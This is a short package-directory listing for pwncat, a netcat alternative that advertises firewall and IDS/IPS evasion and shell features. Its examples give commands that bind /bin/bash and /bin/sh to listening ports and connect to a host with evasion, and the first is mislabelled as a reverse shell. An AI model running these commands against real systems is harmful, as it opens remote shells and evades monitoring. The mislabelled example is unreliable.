pwncat

Netcat alternative with FW/IDS/IPS evasion and shell capabilities

brewmacoslinux
Try with needOr install directly
Source

About

Netcat with FW/IDS/IPS evasion, self-inject-, bind- and reverse shell

Commands

pwncat

Examples

Start a reverse shell connecting back to attacker machine$ pwncat -l -p 4444 -e /bin/bash
Bind shell listening on port 5555$ pwncat -l -p 5555 -e /bin/sh
Connect to remote host with evasion techniques$ pwncat -c 192.168.1.100 4444